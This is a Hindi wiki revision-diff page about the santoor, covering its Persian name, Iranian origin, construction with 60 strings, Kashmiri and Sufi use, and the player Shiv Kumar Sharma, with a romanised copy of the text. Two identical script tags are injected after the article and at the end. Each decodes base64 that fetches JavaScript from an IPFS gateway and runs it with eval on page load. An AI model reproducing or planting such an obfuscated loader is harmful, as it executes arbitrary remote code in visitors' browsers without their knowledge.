Difference between revisions of "संतूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
[[चित्र:Santoor.jpg|thumb|250px|संतूर]]
 
[[चित्र:Santoor.jpg|thumb|250px|संतूर]]
'''संतूर''' एक [[वाद्य यंत्र]] है। संतूर का भारतीय नाम 'शततंत्री वीणा' यानी सौ तारों वाली [[वीणा]] जिसे बाद में [[फ़ारसी भाषा]] से संतूर नाम मिला।
+
'''संतूर''' एक [[वाद्य यंत्र]] है। संतूर का भारतीय नाम 'शततंत्री वीणा' यानी सौ तारों वाली [[वीणा]] है जिसे बाद में [[फ़ारसी भाषा]] से संतूर नाम मिला।
 
*संतूर की उत्पत्ती लगभग 1800 [[वर्ष|वर्षों]] से भी पूर्व [[ईरान]] में मानी जाती है बाद में यह [[एशिया]] के कई अन्य देशों में प्रचलित हुआ जिन्होंने अपनी-अपनी सभ्यता और [[संस्कृति]] के अनुसार इसके रूप में परिवर्तन किए।
 
*संतूर की उत्पत्ती लगभग 1800 [[वर्ष|वर्षों]] से भी पूर्व [[ईरान]] में मानी जाती है बाद में यह [[एशिया]] के कई अन्य देशों में प्रचलित हुआ जिन्होंने अपनी-अपनी सभ्यता और [[संस्कृति]] के अनुसार इसके रूप में परिवर्तन किए।
 
*संतूर लकड़ी का एक चतुर्भुजाकार बक्सानुमा यंत्र है जिसके ऊपर दो-दो मेरु की पंद्रह पंक्तियाँ होती हैं।  
 
*संतूर लकड़ी का एक चतुर्भुजाकार बक्सानुमा यंत्र है जिसके ऊपर दो-दो मेरु की पंद्रह पंक्तियाँ होती हैं।  

Revision as of 13:32, 26 January 2012

thumb|250px|santoor santoor ek vady yantr hai. santoor ka bharatiy nam 'shatatantri vina' yani sau taroan vali vina hai jise bad mean farasi bhasha se santoor nam mila.

  • santoor ki utpatti lagabhag 1800 varshoan se bhi poorv eeran mean mani jati hai bad mean yah eshiya ke kee any deshoan mean prachalit hua jinhoanne apani-apani sabhyata aur sanskriti ke anusar isake roop mean parivartan kie.
  • santoor lak di ka ek chaturbhujakar baksanuma yantr hai jisake oopar do-do meru ki pandrah panktiyaan hoti haian.
  • ek sur se milaye gaye dhatu ke char tar ek jo di meru ke oopar lage hote haian. is prakar taroan ki kul sankhya 60 hoti hai.
  • age se mu di huee dandiyoan se ise bajaya jata hai.
  • santoor mool roop se kashmir ka lok vady yantr hai aur ise soofi sangit mean istemal kiya jata tha.
  • shiv kumar sharma bharat ke prasiddh santoor vadak hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>